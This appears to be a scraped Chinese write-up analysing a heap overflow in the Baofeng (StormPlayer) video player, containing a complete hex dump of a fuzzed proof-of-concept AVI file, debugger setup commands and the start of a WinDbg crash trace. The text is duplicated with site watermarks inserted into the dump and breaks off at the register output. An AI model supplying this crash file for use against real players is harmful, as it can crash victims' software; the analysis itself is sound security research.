暴风影音AviIndexChunk字段堆溢出漏洞分析实战
年前Fuzzing暴风影音时,得到一个avi格式poc样本,MSEC插件提示Exploitable,一直拖到现在才把整个分析过程整理出来。最后虽然无法成功利用,但总算搞清楚了漏洞产生的原因。期间自己也悟出了一些漏洞分析的基本思路,细细品味,甚是欢喜。故总结成文,希望能和大家共同探讨漏洞分析奥妙之一二。不当之处,敬请指正。
0×01 漏洞现场还原
系统环境:Win7 x64
暴风影音:5.67.0116.1111
发布日期:2017年01月17日
POC样本内容:
00000000h: 52 49 46 46 68 02 00 00 41 56 49 20 4C 49 53 54 ; RIFFh...AVI LIST
00000010h: 2A 02 00 00 68 64 72 6C FE 80 80 80 80 80 AD C1 ; *...hdrl?€€€€?
00000020h: B0 44 6A F8 80 80 81 AB FC 80 80 80 81 94 02 FE ; 癉j鴢€伀鼆€€仈.?
00000030h: 80 80 80 80 81 B9 F8 80 80 81 87 E0 81 87 E0 81 ; €€€€伖鴢€亣鄟囙?
00000040h: 9B E0 81 96 FE 80 80 80 80 81 B2 E0 80 A3 FC 80 ; 涏仏?€€€伈鄝|€
00000050h: 80 80 81 85 FC 80 80 80 81 B5 FE 80 80 80 80 81 ; €€亝鼆€€伒?€€€?
00000060h: 91 E0 80 BA F8 80 80 81 B1 E0 80 A2 F8 80 80 81 ; 戉€壶€€伇鄝Ⅷ€€?
00000070h: 82 F0 80 81 9E FE 80 80 80 80 81 B8 FE 80 80 80 ; 傪€仦?€€€伕?€€
00000080h: 80 81 AF 71 41 F8 80 80 81 BB F0 80 81 80 E0 81 ; €伅qA鴢€伝饊亐鄟
00000090h: 89 FE 80 80 80 80 80 BA 26 E0 80 A7 C0 B2 E0 81 ; 夻€€€€€?鄝Ю侧?
000000a0h: B3 C1 93 FC 80 80 80 81 9C FC 80 80 80 81 84 67 ; 沉擖€€€仠鼆€€亜g
000000b0h: FE 80 80 80 80 81 BC F8 80 80 81 97 E0 81 9D C1 ; ?€€€伡鴢€仐鄟澚
000000c0h: A9 67 FC 80 80 80 80 B3 FE 80 80 80 80 80 BE F0 ; ゞ鼆€€€楚€€€€€攫
000000d0h: 80 80 B2 E0 80 A1 E0 80 A2 C1 8A E0 81 BB F8 80 ; €€侧€∴€⒘娻伝鴢
000000e0h: 80 81 83 FE 80 80 80 80 81 94 E0 81 83 F0 80 81 ; €亙?€€€仈鄟凁€?
000000f0h: 8B E0 80 AA C1 A4 F8 80 80 80 B9 FE 80 80 80 80 ; 嬥€??€€€哈€€€€
00000100h: 81 AF 62 6B E0 80 B0 F8 80 80 80 BD E0 81 B8 C1 ; 伅bk鄝傍€€€洁伕?
00000110h: 82 FC 80 80 80 81 A5 F0 80 81 A9 FE 80 80 80 80 ; 傸€€€仴饊仼?€€€
00000120h: 80 A4 F8 80 80 80 BA FE 80 80 80 80 80 BA F8 80 ; €?€€€湖€€€€€壶€
00000130h: 80 81 9C 22 FE 80 80 80 80 80 B8 C1 8A FE 80 80 ; €仠"?€€€€噶婠€€
00000140h: 80 80 81 B4 F8 80 80 81 8B F8 80 80 80 A8 F0 80 ; €€伌鴢€亱鴢€€?€
00000150h: 81 91 F0 80 81 83 FE 80 80 80 80 81 97 F8 80 80 ; 亼饊亙?€€€仐鴢€
00000160h: 81 AE F0 80 81 85 FE 80 80 80 80 81 BA FE 80 80 ; 伄饊亝?€€€伜?€
00000170h: 80 80 81 90 E0 81 88 F0 80 80 A8 60 C0 B2 79 F0 ; €€亹鄟堭€€╜啦y?
00000180h: 80 81 88 F0 80 81 AF E0 81 B8 C1 A4 F8 80 80 80 ; €亪饊伅鄟噶?€€€
00000190h: BE 47 FE 80 80 80 80 81 8E E0 81 B3 C1 A6 FE 80 ; 綠?€€€亷鄟沉?€
000001a0h: 80 80 80 80 A6 51 38 00 00 00 00 00 00 00 00 00 ; €€€€?8.........
000001b0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
000001c0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
000001d0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
000001e0h: 00 00 4C 49 53 54 4C 00 00 00 73 74 72 6C 73 74 ; ..LISTL...strlst
000001f0h: 72 68 00 00 00 00 61 75 64 73 00 00 00 00 00 00 ; rh....auds......
00000200h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000210h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000220h: 00 00 00 00 00 00 00 00 00 00 D1 1F 00 00 73 74 ; ..........?..st
00000230h: 72 66 00 00 00 00 4A 55 4E 4B 00 00 00 00 4C 49 ; rf....JUNK....LI
00000240h: 53 54 0C 00 00 00 49 4E 46 4F 49 53 42 4A 00 00 ; ST....INFOISBJ..
00000250h: 00 00 4C 49 53 54 0C 00 00 00 6D 6F 76 69 30 30 ; ..LIST....movi00
00000260h: 64 62 00 00 00 00 69 64 78 31 02 00 00 00 00 00 ; db....idx1......
将上述文件另存为poc.avi即可。
由于是堆溢出漏洞,在实际环境中,poc样本并不会立即导致StormPlayer.exe出现异常,为准确捕获漏洞现场并获得栈回溯的详细信息,需要提前开启hpa页堆调试选项和ust栈回溯选项:
> gflags.exe /i StormPlayer.exe +ust +hpa
Current Registry Settings for StormPlayer.exe executable are: 02001000
ust - Create user mode stack trace database
hpa - Enable page heap
windbg附加至StormPlayer.exe后,打开poc.avi样本,windbg中捕获下列异常:
(484.b28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=23c5d200 ebx=00000000 ecx=00000000 edx=00000002 esi=23c5d26e edi=22297000
年前Fuzzing暴风影音时,得到一个avi格式poc样本,MSEC插件提示Exploitable,一直拖到现在才把整个分析过程整理出来。最后虽然无法成功利用,但总算搞清楚了漏洞产生的原因。期间自己也悟出了一些漏洞分析的基本思路,细细品味,甚是欢喜。故总结成文,希望能和大家共同探讨漏洞分析奥妙之一二。不当之处,敬请指正。
0×01 漏洞现场还原
系统环境:Win7 x64
暴风影音:5.67.0116.1111
发布日期:2017年01月17日
POC样本内容:
00000000h: 52 49 46 46 68 02 00 00 41 56 49 20 4C 49 53 54 ; RIFFh...AVI LIST
00000010h: 2A 02 00 00 68 64 72 6C FE 80 80 80 80 80 AD C1 ; *...hdrl?€€€€?
00000020h: B0 44 6A F8 80 80 81 AB FC 80 80 80 81 94 02 FE ; 癉j鴢€伀鼆€€仈.?
00000030h: 80 80 80 80 81 B9 F8 80 80 81 87 E0 81 87 E0 81 ; €€€€伖鴢€亣鄟囙?
00000040h: 9B E0 81 96 FE 80 80 80 80 81 B2 E0 80 A3 FC 80 ; 涏仏?€€€伈鄝|€
00000050h: 80 80 81 85 FC 80 80 80 81 B5 FE 80 80 80 80 81 ; €€亝鼆€€伒?€€€?
00000060h: 91 E0 80 BA F8 80 80 81 B1 E0 80 A2 F8 80 80 81 ; 戉€壶€€伇鄝Ⅷ€€?
00000070h: 82 F0 80 81 9E FE 80 80 80 80 81 B8 FE 80 80 80 ; 傪€仦?€€€伕?€€
00000080h: 80 81 AF 71 41 F8 80 80 81 BB F0 80 81 80 E0 81 ; €伅qA鴢€伝饊亐鄟
00000090h: 89 FE 80 80 80 80 80 BA 26 E0 80 A7 C0 B2 E0 81 ; 夻€€€€€?鄝Ю侧?
000000a0h: B3 C1 93 FC 80 80 80 81 9C FC 80 80 80 81 84 67 ; 沉擖€€€仠鼆€€亜g
000000b0h: FE 80 80 80 80 81 BC F8 80 80 81 97 E0 81 9D C1 ; ?€€€伡鴢€仐鄟澚
000000c0h: A9 67 FC 80 80 80 80 B3 FE 80 80 80 80 80 BE F0 ; ゞ鼆€€€楚€€€€€攫
000000d0h: 80 80 B2 E0 80 A1 E0 80 A2 C1 8A E0 81 BB F8 80 ; €€侧€∴€⒘娻伝鴢
000000e0h: 80 81 83 FE 80 80 80 80 81 94 E0 81 83 F0 80 81 ; €亙?€€€仈鄟凁€?
000000f0h: 8B E0 80 AA C1 A4 F8 80 80 80 B9 FE 80 80 80 80 ; 嬥€??€€€哈€€€€ 无奈人生安全网
00000100h: 81 AF 62 6B E0 80 B0 F8 80 80 80 BD E0 81 B8 C1 ; 伅bk鄝傍€€€洁伕?
00000110h: 82 FC 80 80 80 81 A5 F0 80 81 A9 FE 80 80 80 80 ; 傸€€€仴饊仼?€€€
00000120h: 80 A4 F8 80 80 80 BA FE 80 80 80 80 80 BA F8 80 ; €?€€€湖€€€€€壶€
00000130h: 80 81 9C 22 FE 80 80 80 80 80 B8 C1 8A FE 80 80 ; €仠"?€€€€噶婠€€
00000140h: 80 80 81 B4 F8 80 80 81 8B F8 80 80 80 A8 F0 80 ; €€伌鴢€亱鴢€€?€
00000150h: 81 91 F0 80 81 83 FE 80 80 80 80 81 97 F8 80 80 ; 亼饊亙?€€€仐鴢€
00000160h: 81 AE F0 80 81 85 FE 80 80 80 80 81 BA FE 80 80 ; 伄饊亝?€€€伜?€
00000170h: 80 80 81 90 E0 81 88 F0 80 80 A8 60 C0 B2 79 F0 ; €€亹鄟堭€€╜啦y?
00000180h: 80 81 88 F0 80 81 AF E0 81 B8 C1 A4 F8 80 80 80 ; €亪饊伅鄟噶?€€€
00000190h: BE 47 FE 80 80 80 80 81 8E E0 81 B3 C1 A6 FE 80 ; 綠?€€€亷鄟沉?€
无奈人生安全网
000001a0h: 80 80 80 80 A6 51 38 00 00 00 00 00 00 00 00 00 ; €€€€?8.........
000001b0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
000001c0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
000001d0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
000001e0h: 00 00 4C 49 53 54 4C 00 00 00 73 74 72 6C 73 74 ; ..LISTL...strlst
000001f0h: 72 68 00 00 00 00 61 75 64 73 00 00 00 00 00 00 ; rh....auds......
00000200h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000210h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000220h: 00 00 00 00 00 00 00 00 00 00 D1 1F 00 00 73 74 ; ..........?..st
00000230h: 72 66 00 00 00 00 4A 55 4E 4B 00 00 00 00 4C 49 ; rf....JUNK....LI
00000240h: 53 54 0C 00 00 00 49 4E 46 4F 49 53 42 4A 00 00 ; ST....INFOISBJ..
00000250h: 00 00 4C 49 53 54 0C 00 00 00 6D 6F 76 69 30 30 ; ..LIST....movi00
00000260h: 64 62 00 00 00 00 69 64 78 31 02 00 00 00 00 00 ; db....idx1...... 无奈人生安全网
将上述文件另存为poc.avi即可。
由于是堆溢出漏洞,在实际环境中,poc样本并不会立即导致StormPlayer.exe出现异常,为准确捕获漏洞现场并获得栈回溯的详细信息,需要提前开启hpa页堆调试选项和ust栈回溯选项:
> gflags.exe /i StormPlayer.exe +ust +hpa
Current Registry Settings for StormPlayer.exe executable are: 02001000
ust - Create user mode stack trace database
hpa - Enable page heap
windbg附加至StormPlayer.exe后,打开poc.avi样本,windbg中捕获下列异常:
(484.b28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=23c5d200 ebx=00000000 ecx=00000000 edx=00000002 esi=23c5d26e edi=22297000
www.wnhack.com